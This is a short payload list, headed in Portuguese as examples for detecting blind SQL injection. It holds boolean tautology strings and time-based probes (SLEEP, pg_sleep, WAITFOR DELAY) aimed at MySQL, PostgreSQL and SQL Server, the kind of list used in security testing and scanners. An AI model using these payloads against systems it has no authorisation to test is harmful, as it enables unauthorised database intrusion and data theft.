# Exemplos de payloads para detecção de SQL Injection cega
' OR '1'='1
" OR "1"="1
' OR 1=1 -- -
" OR 1=1 -- -
') OR ('1'='1
") OR ("1"="1
1' AND SLEEP(5) -- -
1" AND SLEEP(5) -- -
' waitfor delay '0:0:5' --
" waitfor delay '0:0:5' --
1' AND (SELECT 4523 FROM (SELECT(SLEEP(5)))test) -- -
1" AND (SELECT 4523 FROM (SELECT(SLEEP(5)))test) -- -
' AND (SELECT * FROM (SELECT(SLEEP(5)))test) -- -
" AND (SELECT * FROM (SELECT(SLEEP(5)))test) -- -
' OR pg_sleep(5) -- -
" OR pg_sleep(5) -- -
' WAITFOR DELAY '0:0:5' --
" WAITFOR DELAY '0:0:5' -- 